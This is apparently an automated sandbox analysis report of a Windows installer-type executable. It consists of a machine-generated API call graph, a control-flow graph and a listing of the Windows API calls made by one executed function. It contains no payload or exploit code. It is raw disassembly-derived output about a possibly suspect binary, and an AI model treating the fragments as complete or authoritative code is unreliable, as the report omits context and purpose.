3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                          Executed Functions

                                          Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                          • GetClientRect.USER32(?,?), ref: 00405196
                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                          • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                          • ShowWindow.USER32(00000008), ref: 00405333
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
